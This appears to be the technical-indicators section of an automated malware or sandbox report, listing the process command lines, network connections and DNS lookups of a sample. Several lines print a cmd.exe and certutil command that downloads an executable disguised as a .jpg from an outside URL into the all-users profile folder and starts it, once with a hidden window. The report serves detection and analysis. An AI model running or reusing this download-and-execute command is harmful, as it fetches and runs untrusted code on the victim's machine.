Technical Information
- '<SYSTEM32>\cmd.exe' /c certutil -urlcache -split -f https://i.imghippo.com/files/lhuU6173l.jpg %ALLUSERSPROFILE%\B.exe && start %ALLUSERSPROFILE%\B.exe
- %ALLUSERSPROFILE%\b.exe
- 'i.###hippo.com':443
- 'pk#.goog':80
- http://pk#.goog/gsr1/gsr1.crt
- 'i.###hippo.com':443
- DNS ASK i.###hippo.com
- DNS ASK pk#.goog
- '%ALLUSERSPROFILE%\b.exe'
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://i.imghippo.com/files/lhuU6173l.jpg %ALLUSERSPROFILE%\B.exe
- '<SYSTEM32>\cmd.exe' /c certutil -urlcache -split -f https://i.imghippo.com/files/lhuU6173l.jpg %ALLUSERSPROFILE%\B.exe && start %ALLUSERSPROFILE%\B.exe' (with hidden window)